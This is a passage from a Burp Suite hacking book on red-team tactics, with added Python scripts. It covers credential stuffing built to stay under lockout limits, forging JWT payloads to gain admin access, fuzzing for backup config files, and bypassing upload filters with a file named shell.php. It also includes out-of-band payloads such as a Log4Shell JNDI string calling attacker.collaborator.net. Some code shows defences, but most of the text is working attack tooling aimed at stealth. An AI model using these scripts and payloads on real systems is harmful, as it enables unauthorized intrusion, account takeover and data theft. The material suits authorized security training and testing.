BURP SUITE HACKING by SAMUEL SHEPHERD

Author: SAMUEL SHEPHERD
Language: eng
Format: epub


Chapter 10: Real-World Scenarios – Red Team Tactics Using Burp

Red team engagements aim to simulate real-world attackers, and Burp Suite becomes an indispensable tool in that arsenal when used with tactics that go far beyond traditional vulnerability scanning. A red teamer must think creatively, chain weaknesses, and leverage subtle flaws to gain access, escalate privileges, maintain persistence, and exfiltrate data — all while staying undetected. Burp Suite’s modular architecture and its ability to integrate with external tools, scripts, and deception mechanisms make it ideal for stealthy and targeted engagements that replicate genuine threat actor behavior.

A typical red team scenario begins with reconnaissance. Suppose you're targeting a SaaS platform like portal.corp.example.com. The first step is passive recon using tools like Amass or Subfinder, collecting subdomains and resolving them to IPs. While most recon tools run externally, you can add the discovered hosts to Burp Suite's scope in the Target tab (Target > Scope), which keeps Proxy history, the crawler and the scanner focused on the engagement and stops out-of-scope requests from leaking to third-party hosts. Once scope is defined, the crawler (Spider in Burp 1.x) can be run selectively to map directories, while the Proxy captures every interaction, including session tokens and API calls.

Red teamers often impersonate users. If credentials are obtained via phishing, credential stuffing, or password spraying, Burp is used to validate those logins with as little noise as possible. To test stolen credentials while avoiding account lockout policies, load the usernames and passwords into Burp Intruder as two aligned payload sets and use the Pitchfork attack type, so each username is tried with its own password exactly once, and throttle the attack (in Burp 2.x through the Resource Pool settings: one concurrent request and a delay between requests). A basic credential stuffing list for Intruder might look like this:

admin:Summer2023
jdoe:Password1!
asmith:Welcome123

Set the payload positions on the username and password fields of the login POST body and configure Grep Match on strings like Welcome or Invalid password to distinguish success from failure; a change in status code or response length is often an equally reliable tell. Use Grep Extract to pull session tokens from the Set-Cookie header or the body of successful responses and reuse them in Repeater to simulate authenticated sessions. Keep the number of attempts per account below the lockout threshold and spread attempts across accounts rather than hammering one.
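As an added example, not code from the book: the same credential-stuffing loop driven as a script through Burp's proxy listener, so every attempt still lands in Proxy history, with the per-account lockout guard, request delay and the Grep Match / Grep Extract classification done in code. The login URL, form field names, success and failure strings, session cookie name and the lockout policy are assumptions for illustration.

```python
# Added example (not from the book): throttled credential stuffing sent through
# Burp's proxy, with response classification equivalent to Grep Match / Grep Extract.
# Target URL, field names, success/failure strings and cookie name are assumptions.
import re
import time
from collections import defaultdict

PROXY = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}  # Burp listener (assumed default)
LOGIN_URL = "https://portal.corp.example.com/login"                          # assumed endpoint

# Constructed "username:password" pairs, the same format as the Intruder payload list.
PAIRS = """admin:Summer2023
jdoe:Password1!
asmith:Welcome123
jdoe:Winter2023
jdoe:Spring2024"""


def parse_pairs(text):
    """Split 'user:pass' lines into (user, password) tuples; passwords may contain ':'."""
    out = []
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        user, _, password = line.partition(":")
        out.append((user, password))
    return out


def classify(status, body, headers):
    """Grep Match equivalent: decide success/failure from the response.
    Returns (verdict, session_token_or_None); token extraction is the Grep Extract step."""
    if "Invalid password" in body or status == 401:
        return "fail", None
    if "Welcome" in body or status == 302:
        m = re.search(r"session=([A-Za-z0-9_\-]+)", headers.get("Set-Cookie", ""))
        return "success", (m.group(1) if m else None)
    return "unknown", None


class LockoutGuard:
    """Cap attempts per account per time window so the run stays under the lockout policy."""

    def __init__(self, max_attempts, window_seconds):
        self.max_attempts = max_attempts
        self.window = window_seconds
        self.history = defaultdict(list)  # user -> timestamps of attempts

    def allow(self, user, now):
        recent = [t for t in self.history[user] if now - t < self.window]
        self.history[user] = recent
        if len(recent) >= self.max_attempts:
            return False
        recent.append(now)
        return True


def stuff(pairs, send, guard, delay=1.0, clock=time.time, sleep=time.sleep):
    """Run each pair through `send(user, password) -> (status, body, headers)`.
    Attempts that would exceed the guard are reported as 'skipped' rather than fired."""
    results = {}
    for user, password in pairs:
        if not guard.allow(user, clock()):
            results[(user, password)] = ("skipped", None)
            continue
        status, body, headers = send(user, password)
        results[(user, password)] = classify(status, body, headers)
        sleep(delay)  # the request-delay / resource-pool throttle, done client-side
    return results


def send_via_burp(user, password):
    """Live sender: POST the form through Burp so every attempt appears in Proxy history.
    verify=False because the TLS certificate seen by the client is Burp's own CA."""
    import requests  # only needed for live use, not for the offline demo
    r = requests.post(LOGIN_URL, data={"username": user, "password": password},
                      proxies=PROXY, verify=False, allow_redirects=False)
    return r.status_code, r.text, r.headers


if __name__ == "__main__":
    guard = LockoutGuard(max_attempts=3, window_seconds=900)  # assumed policy: 3 tries per 15 min
    for (user, _), verdict in stuff(parse_pairs(PAIRS), send_via_burp, guard).items():
        print(user, verdict)
```

The sender is injected so the loop can be exercised offline against a fake login; swapping in `send_via_burp` routes the real traffic through the listener on 127.0.0.1:8080.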

After login, enumeration of user roles and functions often begins. Burp Repeater helps craft requests to hidden endpoints or modify existing session cookies and JWTs to test horizontal or vertical privilege escalation. A JWT has three base64url-encoded segments separated by dots (header.payload.signature), with the trailing padding stripped. If the payload segment decodes to:

{"user":"jdoe","role":"user"}

use Decoder (or the Inspector panel, which decodes JWTs in place) to change it to:

{"user":"admin","role":"admin"}

Then re-encode it and substitute the new payload segment into the token carried in the Authorization header. Encoded on its own, the modified payload is:

Authorization: Bearer eyJ1c2VyIjoiYWRtaW4iLCJyb2xlIjoiYWRtaW4ifQ==

In a real token this segment sits between the header and the signature, and it is base64url without the trailing padding, so the value above is the payload only, not a complete JWT. Submit the modified token in Repeater and observe whether admin-only endpoints respond. Because editing the payload leaves the original signature stale, the request can only succeed if the server does not verify the signature at all, accepts an unsigned token (alg set to none), or can be tricked into verifying with the wrong key; success therefore reveals broken token validation as well as broken access control. The JWT Editor extension from the BApp Store automates these edits and the common signature attacks.
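An added example, not from the book, showing what the JWT edit above actually does on the wire with a constructed HS256 key and claims: the payload is re-encoded in base64url and spliced back into the token, and the same forged token is then handed to a server that skips signature verification and to one that checks it. The key, the claim names and all function names are assumptions.

```python
# Added example (not from the book): tampering a JWT payload the way the text describes,
# then showing which kind of server accepts it. Key and claims are constructed.
import base64
import hashlib
import hmac
import json


def b64url_encode(raw: bytes) -> str:
    """JWT segments are base64url with the '=' padding stripped."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    """Restore padding before decoding (Burp's Decoder expects padded input)."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(signing_input: bytes, key: bytes) -> str:
    return b64url_encode(hmac.new(key, signing_input, hashlib.sha256).digest())


def make_jwt(payload: dict, key: bytes) -> str:
    header = {"alg": "HS256", "typ": "JWT"}
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    return f"{h}.{p}.{sign_hs256(f'{h}.{p}'.encode(), key)}"


def tamper(token: str, **changes) -> str:
    """The Decoder step: decode the payload, edit claims, re-encode, splice it back.
    The signature is deliberately left as it was, which is exactly the forged state."""
    h, p, s = token.split(".")
    payload = json.loads(b64url_decode(p))
    payload.update(changes)
    new_p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    return f"{h}.{new_p}.{s}"


def decode_unverified(token: str) -> dict:
    """What a broken server does: trust the claims without checking the signature."""
    return json.loads(b64url_decode(token.split(".")[1]))


def verify_hs256(token: str, key: bytes):
    """What a correct server does: pin the algorithm, recompute the MAC over
    header.payload and compare in constant time. Returns the claims or None."""
    try:
        h, p, s = token.split(".")
    except ValueError:
        return None
    header = json.loads(b64url_decode(h))
    if header.get("alg") != "HS256":  # refuse alg switching ("none", key confusion)
        return None
    expected = sign_hs256(f"{h}.{p}".encode(), key)
    if not hmac.compare_digest(expected.encode(), s.encode()):
        return None
    return json.loads(b64url_decode(p))


SECRET = b"constructed-demo-secret"  # assumption: the server's HMAC key

if __name__ == "__main__":
    original = make_jwt({"user": "jdoe", "role": "user"}, SECRET)
    forged = tamper(original, user="admin", role="admin")
    print("forged token      :", forged)
    print("unverified server :", decode_unverified(forged))
    print("verifying server  :", verify_hs256(forged, SECRET))
```

If the target accepts the forged token, the finding is in `verify_hs256`'s absence on the server, which is a more severe issue than the role check itself; note it as such in the report.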

Red teams also seek sensitive files and misconfigured endpoints. With tools like ffuf or dirsearch, you can enumerate paths using wordlists such as SecLists/Discovery/Web-Content. Running ffuf through Burp:

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u https://portal.corp.example.com/FUZZ -x http://127.0.0.1:8080

lets you review each discovered endpoint in Burp's Proxy history and send it to Repeater. Filter ffuf's output on status code and size (for example -fc 404) so that only real hits reach Burp. If a path like /config.php.bak or /debug/logs.txt is found, read its contents in the response viewer, reaching for Decoder only when values inside it are encoded (base64 connection strings, for instance), and look for sensitive tokens, internal IPs, or database credentials.

Once valid credentials or session tokens are acquired, a red teamer escalates by chaining vulnerabilities. If you find a file upload feature, use Repeater to upload a series of test files, starting with a tampered multipart part whose declared Content-Type claims an image while the filename keeps a server-side extension. Servers that validate only the client-supplied Content-Type accept this; servers that key on the extension need other variations (double extensions, case changes, or a valid image with script appended), and the order in which these fail tells you how validation is implemented. The part headers, in the order a browser sends them:

Content-Disposition: form-data; name="file"; filename="shell.php"

Content-Type: image/jpeg
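
An added example, not from the book: constructing the tampered multipart part shown above and running it past two constructed upload validators, one that trusts the declared Content-Type (the weak setting) and one that ignores it in favour of an extension allow-list and magic-byte checks. The boundary, field name, allow-list and the PHP stub are constructed for the demo; the stub is not a working shell.

```python
# Added example (not from the book): the tampered multipart part from the text,
# checked against a naive and a hardened upload validator. All names are constructed.
import os
import re

PHP_STUB = b"<?php echo 'constructed test payload'; ?>"  # constructed marker, not a shell
JPEG_MAGIC = b"\xff\xd8\xff"
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"


def build_multipart(filename: str, content_type: str, data: bytes, field="file", boundary=None):
    """Return (body, Content-Type header value) for a single-part upload.
    Part headers follow browser order: Content-Disposition first, then Content-Type."""
    boundary = boundary or ("----BurpDemo" + os.urandom(8).hex())
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    ).encode()
    body = head + data + f"\r\n--{boundary}--\r\n".encode()
    return body, f"multipart/form-data; boundary={boundary}"


def parse_part(body: bytes):
    """Minimal parser for a single-part body: returns (filename, content_type, data)."""
    head, _, rest = body.partition(b"\r\n\r\n")
    filename = re.search(rb'filename="([^"]*)"', head).group(1).decode()
    ctype = re.search(rb"Content-Type: ([^\r\n]+)", head).group(1).decode()
    data = rest.rsplit(b"\r\n--", 1)[0]
    return filename, ctype, data


def naive_accepts(body: bytes) -> bool:
    """Vulnerable check: trusts the client-supplied Content-Type and keeps the filename."""
    _, ctype, _ = parse_part(body)
    return ctype.startswith("image/")


def hardened_accepts(body: bytes) -> bool:
    """Hardened check: extension allow-list, magic bytes must match the extension,
    declared Content-Type ignored entirely. A production server would additionally
    re-encode the image and store it under a server-chosen name."""
    filename, _, data = parse_part(body)
    ext = os.path.splitext(os.path.basename(filename).lower())[1]
    magic = {".jpg": JPEG_MAGIC, ".jpeg": JPEG_MAGIC, ".png": PNG_MAGIC}
    if ext not in magic:
        return False
    if not data.startswith(magic[ext]):
        return False
    if b"<?php" in data:  # image/script polyglot: valid header with script appended
        return False
    return True


if __name__ == "__main__":
    body, ctype = build_multipart("shell.php", "image/jpeg", PHP_STUB)
    print(body.decode(errors="replace"))
    print("naive accepts   :", naive_accepts(body))
    print("hardened accepts:", hardened_accepts(body))
```

Paste the printed body into Repeater with the matching Content-Type header, or reuse `build_multipart` from a script that sends through the Burp proxy, and compare which variants the target accepts.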

Check the upload directory manually or through forced browsing, and confirm whether the file is served under its uploaded extension and executed by the server. A shell obtained this way is the starting point for pivoting into the internal network. Separately, Burp Collaborator finds blind vulnerabilities that never show in the response: embed out-of-band payloads into headers or fields, such as:

User-Agent: ${jndi:ldap://attacker.collaborator.net/a}

or

X-Forwarded-For: [email protected]

Monitor the Collaborator client for DNS, HTTP, or SMTP interactions; a DNS lookup alone proves the payload was parsed by something that resolves hostnames, while an HTTP interaction shows a full outbound connection was made. Use a unique Collaborator subdomain per injection point so each callback maps back to the header or parameter that caused it. Blind SSRF or XXE detection relies on the same Collaborator or Interactsh logs, which capture evidence of internal services being coerced into making external requests.
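An added example, not from the book, of the bookkeeping a practitioner wants around the Collaborator payloads above: mint one unique subdomain per injection point, render it as the JNDI string for headers or a plain URL for SSRF parameters, and correlate a log of interactions back to the header or parameter that fired. The callback domain and the JSON-lines log format are constructed stand-ins for Collaborator's own client output and are not its real API.

```python
# Added example (not from the book): per-injection-point Collaborator payloads and
# correlation of callbacks. Domain and log format are constructed for the demo.
import json
import secrets


def make_payloads(callback_domain: str, injection_points: list, token_bytes=6):
    """Return ({injection_point: payload_host}, {token: injection_point}).
    Each point gets its own unguessable leftmost label so callbacks are attributable."""
    payloads, index = {}, {}
    for point in injection_points:
        token = secrets.token_hex(token_bytes)
        host = f"{token}.{callback_domain}"
        payloads[point] = host
        index[token] = point
    return payloads, index


def render(point: str, host: str) -> str:
    """Wrap the host in the form suited to the injection point: the text's
    JNDI lookup string for headers, a bare URL for SSRF-style parameters."""
    if point.startswith("header:"):
        return f"${{jndi:ldap://{host}/a}}"
    return f"http://{host}/"


def correlate(log_lines, index):
    """Parse JSON-lines interaction records (constructed keys: protocol, qname, remote)
    and attribute each to its injection point via the leftmost DNS label.
    Records whose label is not ours are dropped as noise or third-party probes."""
    hits = []
    for line in log_lines:
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        token = rec["qname"].split(".")[0].lower()
        point = index.get(token)
        if point is None:
            continue
        hits.append({"point": point, "protocol": rec["protocol"], "remote": rec["remote"]})
    return hits


if __name__ == "__main__":
    points = ["header:User-Agent", "header:X-Forwarded-For", "param:url"]
    payloads, index = make_payloads("attacker.collaborator.net", points)
    for point, host in payloads.items():
        print(f"{point:25s} {render(point, host)}")
```

In a live engagement the `index` mapping is the artefact to keep: a DNS-only interaction for `header:User-Agent` days after the test still tells you exactly which request and field reached a vulnerable parser.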


